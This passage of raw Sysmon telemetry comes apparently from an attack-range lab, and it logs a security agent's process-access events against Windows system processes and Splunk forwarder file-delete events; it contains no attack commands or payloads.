10341000x800000000000000018159Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.782{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018158Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.778{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018157Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.778{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018156Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.776{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018155Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.767{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018154Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.767{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018153Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018152Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018151Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.756{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018150Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.751{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018149Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.750{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018148Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.736{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018147Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.734{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018146Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.723{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018145Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018144Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.703{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018143Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.695{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018142Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.682{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018141Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.666{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018140Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.653{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018139Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.603{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018138Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.595{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018137Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.590{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018136Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.581{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018135Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.572{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018134Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.564{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018133Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.552{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018132Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.549{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 23542300x800000000000000018131Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.227{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6AF670353927FBD97487CC654CFBE16,SHA256=24A297351D5DC874EE8690E774C4FADE27E0ED8773A5C1AA98DADEEBB4A4F3D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:03.589{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2EAB5D62DE5B68C0EAE7BEA23FC29CC,SHA256=4B2EBEC1A6554622194BABA182C7CBE0A5710708227CAA77E4573CB1A9D1FD4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018163Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:03.632{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94B93D99D1FFD871163CD8E2E0507891,SHA256=A1075D9539465821001A3B19D76F5AFE7AB675A8B70782FA9B647C2533F5BD3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:04.670{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6EDBEC206159A5E97A0E26CB5C3E407,SHA256=7D6B04230904CF14D1E5011F495A72A39C79F774B00C4AEC2DC3D0E74E50F824,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018165Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:04.719{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA5D7475008D33B6A4CF09C5E07469F1,SHA256=549682043499ABCADF7F4279232CEBF0D34D88F96B1E15C98706EDBAA422928F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018164Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:04.209{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:05.744{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT 